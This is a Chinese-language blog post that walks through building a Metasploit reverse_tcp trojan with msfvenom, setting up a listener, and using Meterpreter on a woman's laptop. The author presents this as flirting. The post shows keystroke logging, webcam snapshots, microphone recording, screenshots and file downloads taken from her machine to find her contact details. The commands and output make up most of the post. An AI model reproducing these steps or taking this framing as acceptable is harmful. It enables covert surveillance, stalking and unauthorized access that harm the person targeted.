鸡西网站建设制作优化设计
本页定位
在线咨询

图书馆撩妹记下

Yeshisan4周前652A+A-

图书馆撩妹记》是我在17年初写的一篇记录,群里的老哥对我这篇旧文很感兴趣,其实用到的技术都是一些较为基础性的技巧进行结合,并不复杂也不是很高深。由于法律原因某些细节被我删除掉了,但是有老哥问我后面,那我这里就再做一点补充。

Meterpreter简介

Meterpreter是Metasploit框架中的一个扩展模块,也是后渗透中必不可少的一个工具。在Metasploit框架中加载payload对目标机器进行攻击后,当攻击载荷在目标机器触发后会建立一个控制目标机的shell交互界面的通道,而这个通道就是Meterpreter。
meterpreter shell作为渗透模块有很多有用的功能,比如添加一个用户、隐藏一些东西、打开shell、得到用户密码、上传下载远程主机的文件、运行cmd.exe、捕捉屏幕、得到远程控制权、捕获按键信息、清除应用程序、显示远程主机的系统信息、显示远程机器的网络接口和IP地址等信息。(百度copy的)

Meterpreter使用

在使用之前,需要先用msfconsole生成一个exe的木马文件

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.3 LPORT=4444 -f exe > ./yeshisan.exe
  • msfvenom 取代了之前的msfpayload和msfencode
  • p参数指定加载的payload,这里用到的是reverse_tcp反连模块
  • LHOST:设置反连的IP地址,也就是本机
  • LPORT: 设置反连的端口,默认是4444端口
  • f参数:输出为exe木马,可指定输出木马,默认生成在root目录下

当生成的木马在目标机器上运行时,木马会向预设的IP地址和端口发起一个TCP的连接,我们在本地设置监听木马反向连接的端口,当监听到有请求进来后,会自动建立一个meterpreter的会话。

这里我们还需要在本机上设置监听4444端口,通过msfconsole启动Metasploit。

root@plabs:~# msfconsole

载入监听模块

msf > use exploit/multi/handler

载入payload,载荷与刚才生成木马的一致

msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp

查看需要设置的选项

msf exploit(handler) > show options


这里需要设置的是LHOST和LPORT,监听的IP地址和端口,由于生成木马的时候使用的是默认端口,所以这里只需要设置监听的IP地址,然后run,开启监听。

msf exploit(handler) > set LHOST 192.168.0.3
LHOST => 192.168.0.3
msf exploit(handler) > run

在目标机上运行木马之后,msf监听到请求并建立会话

如果你不是很熟悉Meterpreter,可以通过help命令获取帮助

meterpreter > help

Core Commands
=============

Command Description
------- -----------
? Help menu
background Backgrounds the current session
bgkill Kills a background meterpreter script
bglist Lists running background scripts
bgrun Executes a meterpreter script as a background thread
channel Displays information about active channels
close Closes a channel
disable_unicode_encoding Disables encoding of unicode strings
enable_unicode_encoding Enables encoding of unicode strings
exit Terminate the meterpreter session
help Help menu
info Displays information about a Post module
interact Interacts with a channel
irb Drop into irb scripting mode
load Load one or more meterpreter extensions
migrate Migrate the server to another process
quit Terminate the meterpreter session
read Reads data from a channel
resource Run the commands stored in a file
run Executes a meterpreter script or Post module
use Deprecated alias for 'load'
write Writes data to a channel

Stdapi: File system Commands
============================

Command Description
------- -----------
cat Read the contents of a file to the screen
cd Change directory
download Download a file or directory
edit Edit a file
getlwd Print local working directory
getwd Print working directory
lcd Change local working directory
lpwd Print local working directory
ls List files
mkdir Make directory
mv Move source to destination
pwd Print working directory
rm Delete the specified file
rmdir Remove directory
search Search for files
upload Upload a file or directory

Stdapi: Networking Commands
===========================

Command Description
------- -----------
arp Display the host ARP cache
getproxy Display the current proxy configuration
ifconfig Display interfaces
ipconfig Display interfaces
netstat Display the network connections
portfwd Forward a local port to a remote service
route View and modify the routing table

Stdapi: System Commands
=======================

Command Description
------- -----------
clearev Clear the event log
drop_token Relinquishes any active impersonation token.
execute Execute a command
getenv Get one or more environment variable values
getpid Get the current process identifier
getprivs Attempt to enable all privileges available to the current process
getuid Get the user that the server is running as
kill Terminate a process
ps List running processes
reboot Reboots the remote computer
reg Modify and interact with the remote registry
rev2self Calls RevertToSelf() on the remote machine
shell Drop into a system command shell
shutdown Shuts down the remote computer
steal_token Attempts to steal an impersonation token from the target process
suspend Suspends or resumes a list of processes
sysinfo Gets information about the remote system, such as OS

Stdapi: User interface Commands
===============================

Command Description
------- -----------
enumdesktops List all accessible desktops and window stations
getdesktop Get the current meterpreter desktop
idletime Returns the number of seconds the remote user has been idle
keyscan_dump Dump the keystroke buffer
keyscan_start Start capturing keystrokes
keyscan_stop Stop capturing keystrokes
screenshot Grab a screenshot of the interactive desktop
setdesktop Change the meterpreters current desktop
uictl Control some of the user interface components

Stdapi: Webcam Commands
=======================

Command Description
------- -----------
record_mic Record audio from the default microphone for X seconds
webcam_list List webcams
webcam_snap Take a snapshot from the specified webcam

Priv: Elevate Commands
======================

Command Description
------- -----------
getsystem Attempt to elevate your privilege to that of local system.

Priv: Password database Commands
================================

Command Description
------- -----------
hashdump Dumps the contents of the SAM database

Priv: Timestomp Commands
========================

Command Description
------- -----------
timestomp Manipulate file MACE attributes

Meterpreter常用命令

help:查看帮助信息
background:将会话放置后台,退回Msf
download:从目标主机上下载文件
upload:上传文件到目标机
execute:在入侵主机上执行命令
shell:在入侵主机上(仅是Windows主机)运行Windows shell命令
session -i:切换会话

上文的一些补充

既然是接上文的一些补充,那么肯定不会全部列举,下面说一说几个在图书馆一文中后续用到的命令。

键盘记录:keyscan_start

我们可以通过Meterpreter开启键盘记录,来看一看妹子在写啥,打开记事本随便写点东西。

meterpreter > keyscan_start
Starting the keystroke sniffer...

通过下载键盘记录进行查询,可以看到我写的是meizi i love you
下载键盘记录:keyscan_dump

meterpreter > keyscan_dump
Dumping captured keystrokes...
meizi l <Back> i love you

停止键盘记录:keyscan_stop

给妹子来一手惊喜,通过笔记本的摄像头截图一张照片

列出摄像头列表:webcam_list
从摄像头截取一张快照:webcam_snap
麦克风录音:record_mic

这个录音功能就不谈了,如果是手机的话你懂的,懂我意思吧。
配合摄像头来个为爱鼓掌现场直播了解下,当然这功能我基本上没用过,纯属开玩笑。

如果想看妹子现在在干什么,在命令行敲screenshot,截取到的屏幕图片会输出到root目录下。

meterpreter > screenshot
Screenshot saved to: /root/ThWrdjpy.jpeg
meterpreter >


当然别忘了我最初的目标就是为了妹子电脑里的文件,看看有没有联系方式。想要搜索目标电脑上的文件可以用search命令,search -h查看用法。

search -h
Usage: search [-d dir] [-r recurse] -f pattern
Search for files.

OPTIONS:

-d <opt> The directory/drive to begin searching from. Leave empty to search all drives. (Default: )
-f <opt> The file pattern glob to search for. (e.g. *secret*.doc?)
-h Help Banner.
-r <opt> Recursivly search sub directories. (Default: true)

来个简单的例子,比如我要搜索所有的txt文件

通过文件名来看是不是想要的文件,找到可疑的文件后,可通过download命令进行下载,这个只有一个r参数加上文件所在的路径。
meterpreter > download -r c:/1.txt
[*] downloading: c:/1.txt -> 1.txt
[*] downloaded : c:/1.txt -> 1.txt

最后我想给妹子一个惊喜,还是老套路劫持开启apache

root@plabs:~# service apache2 start
[ ok ] Starting web server: apache2.
root@plabs:~#

 

最后

你以为这样就结束了????

这符合我一惯的作风吗???

后面肯定还有剧情,关于进入妹子学校,利用学校的xx进行表白。

但是

我懒得写,全剧终。

相关推荐
全部评论: 0
登录没有账号 切换注册

忘记密码 ?

注册已有账号 切换登录